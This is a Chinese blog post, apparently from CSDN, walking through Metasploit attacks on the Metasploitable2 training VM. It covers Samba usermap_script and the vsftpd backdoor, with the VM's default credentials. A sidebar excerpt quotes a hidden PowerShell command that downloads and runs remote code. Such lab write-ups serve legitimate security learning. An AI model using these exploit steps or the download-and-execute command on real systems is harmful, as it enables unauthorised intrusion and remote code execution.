服务器可以做为靶机吗_Metasploit -- 攻击Metasploitable2靶机

最新推荐文章于 2022-12-28 16:47:54 发布
最新推荐文章于 2022-12-28 16:47:54 发布
阅读量180 收藏 2
点赞数
文章标签: 服务器可以做为靶机吗

为什么年轻时都会颓废堕落一段时间,因为现实否定了我们内心的世界观。。。

---- 网易云热评

一、Metasploitable2简介

Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。

开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。

下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源码包后门漏洞

4、UnreallRCd后门漏洞

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破)

9、Distcc后门漏洞

10、Samba sysmlink默认配置目录遍历漏洞

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞

13、Ingreslock后门漏洞

14、Rlogin后门漏洞

三、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

e2faf22df6724310ef4bdcba78f58b0c.png

2、搜索可利用的模块:search samba

8ea2ffbab301454929df09fea5a2ef2f.png

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options

需要设置目标ip和端口(默认139)

a371200f161de16d96d7aed2ade21590.png

4、设置目标主机地址:192.168.1.131

894c2c1de855040fe53c11a6031a78da.png

5、运行:run 此时已建立shell连接

7767ecf870b1275fd36de2ef26751efb.png

6、查看目标主机目录文件:ls

2445d76229392d2c906729c88654b830.png

四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd

3d7a7027befd64c20903b2296e96c47a.png

2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要设置的参数:show options

需要设置目标ip和端口(默认21)

caf61739c6e0cc5e1902e5fff278528a.png

3、设置目标主机地址:192.168.1.136

489895cab8dcd8453a93deca62713360.png

4、 运行:run 此时已建立shell连接

9c99c013ca28b2a0ba312e02fe3ff38f.png

5、查看目标主机目录文件:ls

73970940d11fa799f5980dd51df8bb8a.png

禁止非法,后果自负

欢迎关注公众号:web安全工具库

weixin_39637049
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
部署-阿里云服务器搭建靶机教程-2020.8.18.docx
08-24
在1阿里云服务器搭建vulhub靶场详细教程,如果按照教程操作不来,可以私信我,有不懂的问题也可以私信我
服务器可以做为靶机吗_原创干货 | 从0到1靶机渗透实例之HA:joker
weixin_39705435的博客
11-19 471
听说转发文章会给你带来好运前言国庆过后事情慢慢没那么多了,我就开始整理了一下这个靶机的WP。这次靶机整体难度不算高,而且整个镜像也不大,适合新手练手使用。环境靶机:HA:Joker(ubuntu)Filename: joker.zipFile size: 856 MBMD5: F34A2D25CF07D119F4E19D7D0FCC3DE2SHA1: 380E9DABF962390184...
CVE-2019-1388: Windows UAC 提权
Ms08067安全实验室
12-13 766
漏洞简介该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示 Secure ...
靶机渗透测试实战 ——> peixun-server
weixin_45116657的博客
10-21 1552
一、信息收集 1、nmap扫描内网主机; 命令:nmap -sn 192.168.85.0/24 2、通过nmap扫描端口服务; 命令:nmap -sV -sC -sT -p- 192.168.85.131 3、通过firefox浏览器访问peixun的80的端口; 【思路】 通过浏览网页信息,发现不是cms,是自己写的网站 ——> 扫描工具、扫描目标,根据网页上的功能做测试点; ...
sqlmap一条命令直连服务器靶机
weixin_45571987的博客
09-21 647
sqlmap命令--os-shell的使用一、寻找注入点成功找到注入点二、在sqlmap使用--os-shell直接登录后台服务器!三、获取falglinux命令获取flag使用蚁剑通过sqlmap的后门连上后台服务器 一、寻找注入点 这次的目标是连接该网站的服务器并获取flag 按照咱们注入的流程,先来找找注入点 浏览了一下网页发现框框处很可能有页面交互 点击F12 点击网络可以看见页面发送的包 为了更清晰的观察和获取跟多信息 咱们还是打开burp(记得要在浏览器上把SwitchyOmega扩展下载好,
Metasploitable_ubuntu-book.zip
07-14
Metasploit渗透测试魔鬼训练营》中的"Metasploitable_ubuntu-book.zip"是一个针对安全研究人员和IT专业人员的教育资源,它提供了一个Linux靶机环境,特别适合学习和测试安全漏洞。靶机,简单来说,就是一种模拟...
metasploitable-linux VMware镜像
03-09
安全测试靶机虚拟镜像,仅做安全测试学习使用
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击
Metasploitable3靶机
最新发布
05-09
Metasploitable3是一个win2008的靶机---Metasploitable 3简介 Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。...
张学飞靶机搭建.pdf
10-07
详述五种靶机的搭建方式,以windows2008服务器为环境,包括DVWA,MCIR,Pikachu,mutillidae,bWAPP。
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
redhat红帽smtp靶机服务器配置
边城浪子的博客
09-03 735
step1:添加主机名和域名 sudo gedit /etc/hosts 127.0.0.1 test mail.test.lab sudo test gedit /etc/hostname 修改完成之后使用 reboot进行重启,使得修改生效 使用 hostname 或 hostname -f 查看修改是否成功。 step2:配置yum环境,并安装postfix yum i...
靶机渗透-Vulnhub-My File Server1
dahege666的博客
09-07 473
攻击机:192.168.239.131 靶机:192.168.239.140 1、使用nmap扫描目标主机,查看开启端口服务 2、访问80端口,查看首页和源码没有发现有用的信息 3、目录扫描找到一个readme.txt,包含一个密码 4、扫描扫描中还有包括了两个ftp服务,先连接21端口,查看文件,有的文件不能下载,权限不够,2121端口连接不上。 5、尝试连接smb服务,使用smbclient -L 192.168.239.140 进行匿名登陆,提示输入密码时直
服务器安全测试---kali和靶机环境的安装
热门推荐
King config
01-04 1万+
前言 什么是服务器安全测试 一.Kali安装
Tomcat靶机渗透
weixin_56306210的博客
12-28 2446
Tomcat靶机渗透
网络渗透测试实验三
qq_62623325的博客
11-24 969
网络渗透测试实验三
metasploitable2靶机
雨泽网络工作室
08-16 4845
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
在windows server 2008 R2 中搭建dvwa靶机(详细教程)
weixin_46406308的博客
07-21 2701
实现windows server 2008 r2 dvwa靶机搭建教程准备工作:1.vw虚拟机2.phpstudy安装包附:所有用到的工具和安装包 链接:https://pan.baidu.com/s/1sV51RYYqCsqAqMIF_uv0yQ提取码:l2lswindows server 2008 r2 镜像 链接:https://pan.baidu.com/s/1_qQzsQoWJ1fXIWnq5qgoHg提取码:4hna提示:以下是本篇文章正文内容,下面案例可供参考。
cs在内网横向的使用(靶机
sweetie 的博客
11-02 1572
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值